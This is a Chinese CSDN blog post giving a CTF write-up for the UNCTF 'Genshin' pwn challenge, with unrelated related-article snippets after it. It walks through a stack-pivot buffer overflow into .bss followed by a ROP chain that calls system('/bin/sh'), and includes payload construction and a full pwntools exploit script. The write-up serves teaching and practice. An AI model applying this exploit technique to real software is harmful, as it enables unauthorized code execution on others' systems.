UNCTF 原神 栈迁移

最新推荐文章于 2024-07-22 08:49:22 发布
最新推荐文章于 2024-07-22 08:49:22 发布
阅读量581 收藏
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36995313/article/details/116336535
版权

原神-栈转移

先回忆一下学长上次的解题要点讲解:

  1. 数据在内存中,是没有指定格式的
  2. 一些整型数据,刚好可以对应字符串
  3. 利用已映射的字符串,作为system的参数

如果找不出到题目真正的考点,或者写不出自动抽卡脚本,就只有用栈转移的暴力方法来做了

程序分析

拿到程序,首先checksec检查一下
在这里插入图片描述
No PIE,NO canary,意味着可以少写一点exp
IDA ,F5直接定位到可导致栈溢出的函数:read()
在这里插入图片描述
因为只有NX保护,所以按理说是比较好getshell的,但是此处的read函数,只接受0x58个字符串,再来看看栈中,要达到溢出,至少要0x30个字符,能够利用的,只有40个byte
在这里插入图片描述
如果要用常规方法getshell,payload至少要有占据:

fake_ebp = p64(0xdeadbeef) 
pop_ret = p64(ga_addr) 
sh_addr = p64(bin/sh_addr) 
sys_addr = p64(system_addr) 
ret_addr = p64(read_addr)

40 byte根本不够用。这个时候,就能利用栈转移在另一个地方重新布置rop链了。具体原理见ctfwiki->Fancy ROP。

实现及exp

这里使用bss段作为栈迁移的地址,为了防止影响其他的数据,所以选择bss + 0x500作为栈转移地址

bss_addr = elf.bss(0x500)

system函数地址:

sys_addr = elf.symbols[“system”]

返回地址:
在这里插入图片描述
一般选择上一个函数结束的位置作为返回地址

payload1 = b'a' * 0x30 + payload = bytes('a' * 0x30,"utf-8") +p64(bss_addr) + p64(read_main)
payload = payload.ljust(0x58,b'b')

附加调试器在发送payload之前观察运行情况

gdb.attach( p )
在这里插入图片描述
可以看到,执行leave指令后,RBP变成了BSS段的地址,ret的返回地址为read_main的地址,而再往下,就会执行到read函数.
在这里插入图片描述
可以看到,再这个地方,read的地址地址参数也变成了bss段的地址,因为在这之前也有函数执行(所以就有mov rsp rbp的指令,每个函数结束后,栈帧又复原)和我们原来的bss段的地址相差E0 - B0 = 0x30,这个地方需要注意一下,后面布栈会用到

栈转移和控制程序执行流都成功一半,再来编写后面的payload,后面的payload主要有:

padding + pop + bss_addr + sys_addr

先放上已经写好的payload的调试执行流程

在这里插入图片描述
可以看到pop rdi的目标RSP指向的是0x6027e0,也就是最开始我们迁移到bss段地址的地方,但是read却把读入的字符串存储到0x6027b0,所以再写第二个payload的时候,要注意加上偏移,才能正确控制执行流,而且要确保padding + pop + bss_addr + sys_addr中,bss_addr的地址,和/bin/sh的地址一致

那么就有了payload2:

payload = b'a'* 48 + b'/bin/sh\x00' + p64(pop_rdi) + p64(bss_addr) + p64(sys_addr)
payload = payload.ljust(0x58,b'b')

exp:

#调试的时,gdb输入命令set follow-fork-mode parent
from pwn import *
context.log_level = "debug"

p = process("/mnt/c/Users/FALLEN/OneDrive/ctfprac/pwn/Genshin/GenshinSimulator")
elf = ELF("/mnt/c/Users/FALLEN/OneDrive/ctfprac/pwn/Genshin/GenshinSimulator")

bss_addr = elf.bss(0x500)
print(bss_addr)
sys_addr = elf.plt["system"]
read_main = 0x0000000000400C63
pop_rdi=0x400d13 #pop rdi ; ret

p.recv()
p.sendline('3')
p.recv()
p.sendline('1')
p.recv()
#gdb.attach(p)
payload = bytes('a' * 0x30,"utf-8") +p64(bss_addr) + p64(read_main)
payload = payload.ljust(0x58,b'b') #很重要,如果不填充,会影响下次一的数据输入
p.send(payload)
sleep(5)
payload = b'a'* 48 + b'/bin/sh\x00' + p64(pop_rdi) + p64(bss_addr) + p64(sys_addr) #一直填充到0x30,才能添入/bin/sh,应该是
payload = payload.ljust(0x58,b'b')                                                 #read的时候,执行了sub rsp 0x30,而bss_addr对应的地址又刚好是栈中RBP的地址
p.send(payload)
#gdb.attach(p)
p.interactive()
X_FALLEN
关注
专栏目录
迁移/劫持
chennbnbnb的博客
01-30 1033
例子 https://github.com/scwuaptx/HITCON-Training/tree/master/LAB/lab6 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int count = 1337 ; int main(){ if(count != 13...
迁移图解
qq_40410406的博客
11-11 1570
迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行溢出攻击,所以需要另寻出路。 2 溢出长度不足以使用直接 ROP 3 溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了不可执行保护,就需要迁移到bss段或者data段或者其他位置执行我们的gadge
迁移
huzai9527的博客
02-22 577
迁移 1.为什么需要转移? 在空间不够存放payload的情况下,需要一个新的地址空间存放payload 开启PIE保护,地址未知,我们可以将劫持到已知的区域 2.概念 劫持的rsp(ESP),使其指向其他位置,形成一个伪造的,在此中做ROP 3.必要的gadget pop ebp;ret 释放EBP,并连接伪造的 leave;ret 更改ESP,指向后续的payload 4.原理 通过 pop ebp;ret + 伪造的让程序直接跳转到伪造的里面,然后为了保持平衡
迁移总结
2302_79899078的博客
03-13 1647
迁移,orw
迁移小总结
weixin_61283545的博客
04-24 449
[BUUCTF]PWN14——not_the_same_3dsctf_2016_mcmuyanga的博客-CSDN博客
Pwn-转移(stack immigration)
CharlesGodX的博客
04-08 1662
0x00:前言 转移(stack immigration)主要是为了解决溢出可以溢出空间大小不足的问题,HITCON-Training-master 的 lab6 就是用的这个原理,我们来实践一下这道题目。 0x01:实例 题目链接: https://github.com/scwuaptx/HITCON-Training/blob/master/LAB/lab6/migration 运行一下程...
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
论文研究-基于超级基站的协议迁移机制设计与实现 .pdf
08-15
基于超级基站的协议迁移机制设计与实现,杨俊,王园园,传统无线接入网络基站间不共享处理资源、网络负载多变和潮汐效应的存在导致基站资源利用率低与负载均衡的问题。在中科院计算所的
pwn --迁移
zszcr的博客
04-07 7102
迁移主要是为了解决溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
简单迁移学习笔记
Scarehehe的博客
12-02 411
BUU gyctf_2020_borrowstack学习笔记 查看保护 gyctf_2020_borrowstack$ checksec pwn1 [*] '/home/pwn/桌面/gyctf_2020_borrowstack/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE
两题看迁移
qq_45691294的博客
01-05 672
文章目录迁移[Black Watch 入群题]PWN 迁移 迁移的题目一般有一个特点,就是可以产生溢出,但是溢出的长度太短导致无法写完整的payload,而实质就是只能控制ebp的情况下去控制住eip从而控制程序的执行流 以 32 位程序举例,在使用 call 这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。 执行完函数后会进行一系列操作来还原现场 lea
迁移原理介绍与应用
weixin_39529207的博客
02-20 5521
本文将对CTF Pwn中「迁移」(又称「转移」)这一技术进行介绍与分析,希望读完本文后以下问题将不再困扰你: 什么是迁移迁移解决了什么问题? 怎么使用迁移这个技巧? 开始之前,有如下预备知识会极大提升你的阅读体验: CTF Pwn是在做什么?提权(Getshell)是什么意思? 在操作系统内存布局中,是一种怎样的结构,具有怎样的特点? x86中常用寄存器的名称与作用?函数调用的原理与过程是怎样的? 溢出攻击的核心技巧是什么? 溢出是怎么回事?  在预备知识的4个问
CTF-PWN迁移
m0_53921051的博客
04-05 929
帧介绍 C语言函数调用帧_大佬菜菜带带的博客-CSDN博客 迁移背景 在溢出构造rop链时,有时我们会遇到构造空间不够的情况。比如我们需要构造0x30字节的数据,而read()只能读入0x28字节。但是我们可以控制ebp及ret的值,此时可以利用迁移的方法拓展空间。 迁移条件 能够控制rbp及ret的值。 拥有一块可执行的内存,并且可以连续两次控制该内存。 迁移原理 在函数调用完返回时,会执行leave,ret两条汇编指令。 leave: mov esp ebp; pop
[LitCTF 2023]原来你也玩原神 (初级)
2301_80189829的博客
12-13 848
得 NSSCTF{YUANLAINIYEWANYUANSHENWWW}
BugkuCTF-MISC题可爱的故事
am_03的博客
09-05 1213
下载文件,打开两张图片 根据评论提示是原神里面的提瓦特字母 题目的提示说flag就藏在图片特殊文字里,还提到谷歌翻译,开始以为要把文字翻译成我们认识的,结果半天提取不出来文字,看了其他暗示,才知道这是类游戏里的文字,提瓦特文字,下面是它与英语字母的对照表(拷来的图片,呵呵) 题目提示提到flag 是大兔子说到的一句带有bugku的话,我们直接按照对照表找出bugku,因为猜想题目难度不会太难,就在每张图的开头结尾找bugku“提瓦特”的字样,然后真的在第一张图结尾找到bugku ...
测中日记 LitCTF 密码学 WP
LyNzyds的博客
05-14 1204
同上,我们得到本题flag:NSSCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}这样我们就得到了明文m :LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}那么现在就需要翻译这串提瓦特文字,翻译这串文字只需要在浏览器里面搜索“提瓦特语言翻译”,我们就能够找到这样一张图。回归正题,关于RSA我并没有系统的学习过,所以我上网上搜索借鉴了其他师傅写的脚本修改了一下捏!
2024LitCTFmisc复现
最新发布
WTT001的博客
07-22 1143
base64喽。
ctf-misc-图片隐写
ZZZH666_的博客
11-19 734
ctf
UNCTF2020 部分题目总结
Scarehehe的博客
11-20 663
UNCTF2020 部分题目总结
基于按位异或的基站协议迁移优化
基站协议的高效运行和动态迁移是这种架构的关键技术挑战之一。 传统的动态迁移方案在处理基站协议迁移时,未能充分考虑到其特定的运行特性,如实时性和对小于50毫秒停机时间的需求。为解决这一问题,研究者提出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值